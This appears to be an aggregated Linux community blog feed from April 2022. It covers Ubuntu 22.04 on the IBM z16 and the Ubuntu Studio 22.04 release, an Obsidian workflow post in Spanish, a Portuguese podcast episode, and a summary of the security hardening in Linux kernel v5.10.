“Since the development of the new IBM z16 happened in parallel with the development of the upcoming Ubuntu Server release, Canonical was able to ensure that Ubuntu Server 22.04 LTS (beta) already includes support for new IBM z16 capabilities.

And this is not limited to the support for the core system, but also includes its peripherals and special facilities”

Now that it’s release day, I wanted to celebrate with the community by sharing a few details of the IBM z16 and some highlights from those blog posts.

So first – the IBM z16 is so pretty! It comes in one to four frames, depending on the needs of the client. Inside the maximum configuration it has up to 200 Processor Units, featuring 5.2Ghz IBM Telum Processors, 40 TB of memory, and 85 LPARs.

As for how Ubuntu was able to leverage improvements to 22.04 to take advantage of everything from the AI Accelerator on the IBM Telum processor to new Quantum-Safe technologies, Frank goes on to share:

“Since we constantly improve Ubuntu, 22.04 was updated and modified for IBM z16 and other platforms in the following areas:

  • virtually the entire cryptography stack was updated, due to the switch to openssl 3
  • some Quantum-safe options are available: library for quantum-safe cryptographic algorithms (liboqs), post-quantum encryption and signing tool (codecrypt), implementation of public-key encryption scheme NTRUEncrypt (libntru)
  • Secure Execution got refined and the virtualization stack updated
  • the chacha20 in-kernel stream cipher (RFC 7539) was hardware optimized using SIMD
  • the kernel zcrypt device driver is now able to exploit the new IBM zSystems crypto hardware, especially Crypto Express8S (CEX8S)
  • and finally a brand new protected key crypto library package (libzpc) was added

This is a really interesting time to be a Linux distribution in this ecosystem. Beyond these fantastic strides made with Ubuntu, the collaboration that’s already taking place across distributions in our new Working Group has been exciting to watch.

Keep up the good work, everyone! And Ubuntu friends, pause a bit today to celebrate, you’ve earned it.

Jellyfish earrings!

Side note: I haven’t mentioned the IBM LinuxONE. As some background, the IBM z16 can have Integrated Facility for Linux (IFL) processors, so you can already run Linux on this generation of mainframes! But the LinuxONE product line only has IFLs, meaning they exclusively run Linux. As a separate product, it can have different release dates, and the current timeline that’s been published is “second half of 2022” for the announcement of the next LinuxONE. Stay tuned, and know that everything I’ve shared about Ubuntu 22.04 for the IBM z16 will also be true of the next LinuxONE.

on April 21, 2022 05:39 PM

The Ubuntu Studio team is pleased to announce the release of Ubuntu Studio 22.04, code-named “Jammy Jellyfish”. This marks Ubuntu Studio’s 31st release. This release is a Long-Term Support release and as such, it is supported for 3 years (until April 2025).

Since it’s just out, you may experience some issues, so you might want to wait a bit before upgrading. Please see the release notes for a complete list of changes and known issues.

You can download Ubuntu Studio 22.04 LTS from our download page.


Since it’s just out, you may experience some issues, so you might want to wait a bit before upgrading.

Due to the change in desktop environment that started after the release of 20.04 LTS, direct upgrades from 20.04 LTS are not supported and may only be attempted at-your-own-risk. As with any system-critical operation, back-up your data before attempting any upgrade. The safest upgrade path is a backup of your /home directory and a clean install.

We have had anecdotal reports of successful upgrades from 20.04 LTS (Xfce desktop) to later releases (Plasma desktop), but this will remain at your own risk, and it is highly recommended to wait until 22.04.1 is released in August before attempting such an upgrade.

Instructions for upgrading are included in the release notes.

New This Release

Most of this release is evolutionary on top of 21.10 rather than revolutionary. As such, most of the applications contained are simply upgraded versions. Details on key packages can be found in the release notes.

Dark Theme By Default

For this release, we have a neutral-toned dark theme by default. While we could have gone with the Breeze Dark color scheme since we dropped the Materia KDE widget and window theme (it was difficult to maintain and work with new Plasma features), we decided to develop our own based on GNOME’s Adwaita Dark theme with a corresponding Light theme. This was to help with photography since a neutral tone is necessary as Breeze Dark has a more blueish hue, which can trick the eye into seeing photos as appearing warmer than they actually are.

However, switching from the dark theme to the light theme is a breeze (pun somewhat intended). When opening the System Settings, one only has to look at the home screen to see how to do that.

Support for rEFInd

rEFInd is a bootloader for UEFI-based systems. Our settings which help to support the lowlatency kernel help to create a menu entry to help apply those settings and keep the lowlatency kernel as the default kernel detected by rEFInd. To keep it current, simply enter sudo dpkg-reconfigure ubuntustudio-lowlatency-settings in the command line after a kernel update.

For a more complete list of changes, please see the release notes.

Backports PPA

System Settings with Accent Colors (Folder Colors will follow if Backports PPA is added)

There are a few items planned for the Backports PPA once the next release cycle opens. One of those is folder icons that match the accent color set in the System Settings.

We plan on keeping the backports PPA up-to-date for the next two years until the release of 24.04 LTS, at which point you will be encouraged to update.

Instructions for enabling the Ubuntu Studio Backports PPA

  • Automatic method:
    • Open Ubuntu Studio Installer
    • Click “Enable Backports”
  • Manual method:
    • sudo add-apt-repository ppa:ubuntustudio-ppa/backports
    • sudo apt upgrade

Note that at release time, there’s nothing in there yet, so if you add it now (at the time of this writing) you’ll get a 404 (file not found) error.

On a related note, at this time, the Backports PPA is frozen for 21.10 and 20.04 LTS. To receive newer versions of software, you must upgrade.

Plasma Backports

Since we share the Desktop Environment with Kubuntu, simply adding the Kubuntu Backports will help you with keeping the desktop environment and its components up-to-date with the latest versions:

  • sudo add-apt-repository ppa:kubuntu-ppa/backports
  • sudo apt upgrade

More Updates

There are many more updates not covered here but are mentioned in the Release Notes. We highly recommend reading those release notes so you know what has been updated and know any known issues that you may encounter.

Get Involved!

A great way to contribute is to get involved with the project directly! We’re always looking for new volunteers to help with packaging, documentation, tutorials, user support, and MORE! Check out all the ways you can contribute!

Special Thanks

Huge special thanks for this release go to:

  • Len Ovens: Studio Controls, Ubuntu Studio Installer, Coding
  • Thomas Ward: Packaging, Ubuntu Core Developer for Ubuntu Studio
  • Eylul Dogruel: Artwork, Graphics Design, Website Lead
  • Ross Gammon: Upstream Debian Developer, Guidance, Testing
  • Sebastien Ramacher: Upstream Debian Developer
  • Dennis Braun: Debian Package Maintainer
  • Rik Mills: Kubuntu Council Member, help with Plasma desktop
  • Mauro Gaspari: Tutorials, Promotion, and Documentation, Testing
  • Brian Hechinger: Testing and bug reporting
  • Chris Erswell: Testing and bug reporting
  • Robert Van Den Berg: Testing and bug reporting, IRC Support
  • Krytarik Raido: IRC Moderator, Mailing List Moderator
  • Erich Eickmeyer: Project Leader, Packaging, Direction, Treasurer
on April 21, 2022 05:10 PM

April 18, 2022

Hace tiempo en el grupo de Developers Ve en el mundo, preguntaba si alguien había utilizado Obsidian. Considerándome un power user de Evernote, sé lo que necesito, y en los años que llevo buscando una alternativa que funcione en linux, tenia el problema de que muy pocas realmente funcionan bien o siquiera tienen soporte para linux.

Decidí irme por Obsidian, luego de considerar Notion y otras herramientas principalmente por los plugins, que tiene Zettelkasten como feature, esta pensado con las siguientes otras razones:

  • Es perfecto para Zettelkasten y para construir un segundo cerebro (Building a Second Brain), y tiene un sistema de tags simple, pero poderoso.
  • Soporte para Markdown by default.
  • Los archivos están en mis dispositivos, no en la nube by design.
  • Puedo elegir alternativas de respaldo, control de versiones y redundancia.
  • Soporte para Kanban Boards.
  • Soporte para Day Planners.
  • Soporte para Natural Language Dates para cosas like: @today, @tomorrow.
  • La interfaz es exactamente lo que me encanta de Sublime que es lo que había estado utilizando para tomar notas, junto a la aplicación de notas del teléfono y notas via el correo.
  • Tiene un VIM mode :D.
  • El roadmap promete.


Revisando varias cosas, y realmente investigando un poco, llegue al siguiente workflow:

  • Logre construir el workflow que hace lo que necesito:
    • Vault en git en mi VPS, en una instancia propia de gitea, la data es mia.
    • En Linux:
      • El manejo de las distintas Vaults (Bóvedas) seria por git directamente.
        • Nextcloud como mecanismo de backup redundante en el NAS en casa via scsi en un rpi.
        • A mediano, o largo plazo:
          • La solución de NAS podría ser FreeNAS, TrueNAS o Synology
          • VPS como gateway, utilizando vpn con wireguard para mantener todo en una red privada.
    • En OSX:
      • Seria igual que en linux, por git pero con la diferencia de que las bóvedas estarían alojadas en una carpeta en iCloud.
      • La llave ssh con permiso de escritura en el repo seria importada al keystore (ssh-add -K), para que no de problemas a la hora de pedir contraseñas.
      • Queda pendiente revisar como hacer con las firmas de los commits con GPG, o maybe usando ssh para firmar commits
    • En IOS, los vaults se estarían abriendo via iCloud, dejando por fuera el manejo con git, mientras se agrega el soporte en para ios/mobile en obsidian-git.


En un tiempo revisare este post, y actualizare seguramente a mi nuevo workflow… o hare una vista en retrospectiva de que pudo salir mejor, etc, sin embargo creo que la primera tarea que hare, sera escribir un plugin para poderlo integrar con la creación de posts de este blog, y utilizar el grafo de tags, que por ahora… se ve así:

tag cloud

on April 18, 2022 12:00 AM

April 16, 2022

To celebrate the new release of the popular free and open source GNU/Linux distribution Ubuntu 22.04, we are going to hold a release party. The event will take place on the 1st of May. Due to continued COVID uncertainties, the event will be held in a live virtual format with moderated Q&A.  The Call for […]
on April 16, 2022 04:40 AM

April 14, 2022

Ep 190 – Societal

Podcast Ubuntu Portugal

O Miguel está deprimido! Acabou de descobrir que daqui a uns anos – 5, talvez 10 – vai ter de gastar dinheiro num telefone novo. O Carrondo está todo contente com o seu alarme novo, livre. O Constantino andou a conversar no Twitter, para variar… esta semana foi sobre extensões do Firefox. Mas o prato principal desta refeição foi a relação da Comissão Europeia com o Software Livre!

Já sabem: oiçam, subscrevam e partilhem!

  • https://www.wired.co.uk/article/europe-police-facial-recognition-prum
  • https://www.dn.pt/dinheiro/altice-nos-e-vodafone-admitem-desligar-rede-3g-mas-ainda-nao-ha-calendario-14760509.html
  • https://github.com/popey/unsnap
  • https://www.home-assistant.io/integrations/alarm_control_panel/
  • https://addons.mozilla.org/pt-PT/firefox/user/12818933/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=addons-manager-user-profile-link
  • https://web.archive.org/web/20220405115850/https://addons.mozilla.org/pt-PT/firefox/user/12818933/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=addons-manager-user-profile-link
  • https://ec.europa.eu/info/departments/informatics/open-source-software-strategy_en
  • https://joinup.ec.europa.eu/collection/fosseps/news/fosseps-pilot
  • https://joinup.ec.europa.eu/collection/fosseps/news/help-identify-critical-open-source-software
  • https://joinup.ec.europa.eu/collection/ec-ospo/news/nextgov-hackathon
  • https://nextgov-hackathon.eu/tnc/
  • https://twitter.com/EU_DIGIT/status/1484111357893091333
  • https://twitter.com/EU_DIGIT/status/1503728797136433154
  • https://shop.nitrokey.com/shop/product/nk-pro-2-nitrokey-pro-2-3?aff_ref=3
  • https://shop.nitrokey.com/shop?aff_ref=3
  • https://youtube.com/PodcastUbuntuPortugal


Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal.
E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8.
Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem.

Se estiverem interessados em outros bundles não listados nas notas usem o link https://www.humblebundle.com/?partner=PUP e vão estar também a apoiar-nos.

Atribuição e licenças

Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado por Alexandre Carrapiço, o Senhor Podcast.

A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da [CC0 1.0 Universal License](https://creativecommons.org/publicdomain/zero/1.0/).

Este episódio e a imagem utilizada estão licenciados nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

on April 14, 2022 07:45 PM

April 07, 2022

 I regularly fly between Belgium and my second home country Latvia. How much am I sponsoring Vladimir when doing that? About 25€. Back of the envelope calculation.

  • CRL - RIX return = 330 kg CO2 (source)
  • 1 l jet fuel a1 = 2.52 kg CO2 (source)
  • 1 l jet fuel = 0.85€ (source, some currency and SI conversion required)
  • refinery and distribution margin ~ 15% (conservative ballpark guesstimate based upon price/barrel for crude and jet a1 fuel)
  • percentage of Russian crude in EU: 27% (source)
  • (330/2.52)*.85*.85*.27 = 25.55€

P.S. More source countries have "interesting" policies. For example. 8% of EU imports are from Saudi Arabia.

P.P.S. Our upcoming holiday will be by night train. Exciting!

on April 07, 2022 03:21 PM

April 05, 2022

To celebrate the new release of the popular free and open source GNU/Linux distribution, Ubuntu 22.04, we are going to hold a release party. The event will take place on the 1st of May. Due to continued COVID uncertainties, the event will be held in a live virtual format with moderated Q&A.  The Call for […]
on April 05, 2022 09:41 AM

Previously: v5.9

Linux v5.10 was released in December, 2020. Here’s my summary of various security things that I found interesting:

While guest VM memory encryption with AMD SEV has been supported for a while, Joerg Roedel, Thomas Lendacky, and others added register state encryption (SEV-ES). This means it’s even harder for a VM host to reconstruct a guest VM’s state.

x86 static calls
Josh Poimboeuf and Peter Zijlstra implemented static calls for x86, which operates very similarly to the “static branch” infrastructure in the kernel. With static branches, an if/else choice can be hard-coded, instead of being run-time evaluated every time. Such branches can be updated too (the kernel just rewrites the code to switch around the “branch”). All these principles apply to static calls as well, but they’re for replacing indirect function calls (i.e. a call through a function pointer) with a direct call (i.e. a hard-coded call address). This eliminates the need for Spectre mitigations (e.g. RETPOLINE) for these indirect calls, and avoids a memory lookup for the pointer. For hot-path code (like the scheduler), this has a measurable performance impact. It also serves as a kind of Control Flow Integrity implementation: an indirect call got removed, and the potential destinations have been explicitly identified at compile-time.

network RNG improvements
In an effort to improve the pseudo-random number generator used by the network subsystem (for things like port numbers and packet sequence numbers), Linux’s home-grown pRNG has been replaced by the SipHash round function, and perturbed by (hopefully) hard-to-predict internal kernel states. This should make it very hard to brute force the internal state of the pRNG and make predictions about future random numbers just from examining network traffic. Similarly, ICMP’s global rate limiter was adjusted to avoid leaking details of network state, as a start to fixing recent DNS Cache Poisoning attacks.

SafeSetID handles GID
Thomas Cedeno improved the SafeSetID LSM to handle group IDs (which required teaching the kernel about which syscalls were actually performing setgid.) Like the earlier setuid policy, this lets the system owner define an explicit list of allowed group ID transitions under CAP_SETGID (instead of to just any group), providing a way to keep the power of granting this capability much more limited. (This isn’t complete yet, though, since handling setgroups() is still needed.)

improve kernel’s internal checking of file contents
The kernel provides LSMs (like the Integrity subsystem) with details about files as they’re loaded. (For example, loading modules, new kernel images for kexec, and firmware.) There wasn’t very good coverage for cases where the contents were coming from things that weren’t files. To deal with this, new hooks were added that allow the LSMs to introspect the contents directly, and to do partial reads. This will give the LSMs much finer grain visibility into these kinds of operations.

set_fs removal continues
With the earlier work landed to free the core kernel code from set_fs(), Christoph Hellwig made it possible for set_fs() to be optional for an architecture. Subsequently, he then removed set_fs() entirely for x86, riscv, and powerpc. These architectures will now be free from the entire class of “kernel address limit” attacks that only needed to corrupt a single value in struct thead_info.

sysfs_emit() replaces sprintf() in /sys
Joe Perches tackled one of the most common bug classes with sprintf() and snprintf() in /sys handlers by creating a new helper, sysfs_emit(). This will handle the cases where kernel code was not correctly dealing with the length results from sprintf() calls, which might lead to buffer overflows in the PAGE_SIZE buffer that /sys handlers operate on. With the helper in place, it was possible to start the refactoring of the many sprintf() callers.

nosymfollow mount option
Mattias Nissler and Ross Zwisler implemented the nosymfollow mount option. This entirely disables symlink resolution for the given filesystem, similar to other mount options where noexec disallows execve(), nosuid disallows setid bits, and nodev disallows device files. Quoting the patch, it is “useful as a defensive measure for systems that need to deal with untrusted file systems in privileged contexts.” (i.e. for when /proc/sys/fs/protected_symlinks isn’t a big enough hammer.) Chrome OS uses this option for its stateful filesystem, as symlink traversal as been a common attack-persistence vector.

ARMv8.5 Memory Tagging Extension support
Vincenzo Frascino added support to arm64 for the coming Memory Tagging Extension, which will be available for ARMv8.5 and later chips. It provides 4 bits of tags (covering multiples of 16 byte spans of the address space). This is enough to deterministically eliminate all linear heap buffer overflow flaws (1 tag for “free”, and then rotate even values and odd values for neighboring allocations), which is probably one of the most common bugs being currently exploited. It also makes use-after-free and over/under indexing much more difficult for attackers (but still possible if the target’s tag bits can be exposed). Maybe some day we can switch to 128 bit virtual memory addresses and have fully versioned allocations. But for now, 16 tag values is better than none, though we do still need to wait for anyone to actually be shipping ARMv8.5 hardware.

fixes for flaws found by UBSAN
The work to make UBSAN generally usable under syzkaller continues to bear fruit, with various fixes all over the kernel for stuff like shift-out-of-bounds, divide-by-zero, and integer overflow. Seeing these kinds of patches land reinforces the the rationale of shifting the burden of these kinds of checks to the toolchain: these run-time bugs continue to pop up.

flexible array conversions
The work on flexible array conversions continues. Gustavo A. R. Silva and others continued to grind on the conversions, getting the kernel ever closer to being able to enable the -Warray-bounds compiler flag and clear the path for saner bounds checking of array indexes and memcpy() usage.

That’s it for now! Please let me know if you think anything else needs some attention. Next up is Linux v5.11.

© 2022, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

on April 05, 2022 12:01 AM